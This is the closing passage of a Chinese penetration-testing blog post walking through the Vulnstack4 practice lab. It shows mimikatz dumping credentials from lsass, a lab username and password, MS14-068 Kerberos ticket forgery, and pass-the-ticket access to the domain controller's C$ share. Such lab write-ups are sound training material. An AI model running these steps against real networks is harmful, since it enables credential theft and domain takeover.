<p>可以获取到PC机的凭据： <code>douser:Dotest123</code>(假如这里没有看到这个可能是win开机后就没有登录进去过，登录进去再执行命令应该就可以看到了)</p>
<p>使用mimikatz的 <code>sekurlsa::logonpasswords</code> 命令列出用户hash，此处Dotest用户SID为 <code>S-1-5-21-979886063-1111900045-1414766810-1107</code>     (<code>sekurlsa::logonpasswords</code> 命令用于列出所有可用的身份验证提供程序凭据，能够从Windows的<code>lsass.exe</code>进程中提取密码、密钥、PIN码和Kerberos票据等敏感信息。)</p>
<p><img src="/../images/vulnstack4/31.png"></p>
<p>win7这台靶机存在ms14-068漏洞（怎么知道的？当然是作者说的doge）(实际中可以执行命令systeminfo来查看补丁情况来看看可以利用哪些漏洞)</p>
<h5 id="ms14-068漏洞"><a href="#ms14-068漏洞" class="headerlink" title="ms14-068漏洞"></a>ms14-068漏洞</h5><p>进入<strong>c:\Users\douser\Desktop</strong>目录下,执行<strong>ms14-068</strong>查看所需要的参数：</p>
<p><img src="/../images/vulnstack4/32.png"></p>
<p>可以看到这些参数我们都在前面查询到了，现在开始利用这个漏洞打域控：</p>
<p><img src="/../images/vulnstack4/33.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mimikatz (进入mimikatz)</span><br><span class="line">kerberos::ptc TGT_douser@demo.com.ccache (将该票据导入到当前用户的Kerberos票据缓存中。)</span><br><span class="line">dir \\WIN-ENS2VR5TR3N\c$  (进入域控的c盘)</span><br></pre></td></tr></table></figure>

<p><img src="/../images/vulnstack4/34.png"></p>
<p>可以看到成功进入域控c盘</p>
<h4 id="参考大佬的链接："><a href="#参考大佬的链接：" class="headerlink" title="参考大佬的链接："></a>参考大佬的链接：</h4><p>[<a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV19r4y1y7Nk/?spm_id_from=333.337.search-card.all.click&vd_source=83faec40f3919a69a706f1d9fe9f0e04">网络安全&#x2F;域渗透]内网安全入门靶场 vulnstack4攻略_哔哩哔哩_bilibili</a></p>
<p><a target="_blank" rel="noopener" href="https://stack.chaitin.com/techblog/detail/251">内网渗透:VulnStack4靶场全方位打法 - CT Stack 安全社区</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_39583774/article/details/133650244">【红日靶场】vulnstack4-完整渗透过程_红日靶场ms-14-068-CSDN博客</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="followme">
  <span>欢迎关注我的其它发布渠道</span>

  <div class="social-list">

      <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
      </div>
  </div>
</div>

          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F/" rel="tag"># 渗透</a>
              <a href="/tags/vulnstack%E9%9D%B6%E5%9C%BA/" rel="tag"># vulnstack靶场</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/10/25/%E5%A4%9A%E7%BA%BF%E7%A8%8B%E4%B8%8E%E4%B8%B4%E7%95%8C%E5%8C%BA%E5%AE%9E%E9%AA%8C/" rel="prev" title="多线程与临界区实验">
                  <i class="fa fa-angle-left"></i> 多线程与临界区实验
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">yanxiao</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">8k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">29 分钟</span>
  </span>
</div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/next-theme-pjax/0.6.0/pjax.min.js" integrity="sha256-vxLn1tSKWD4dqbMRyv940UYw4sXgMtYcK6reefzZrao=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pangu/4.0.7/pangu.min.js" integrity="sha256-j+yj56cdEY2CwkVtGyz18fNybFGpMGJ8JxG3GSyO2+I=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script><script src="/js/pjax.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  





</body>
</html>
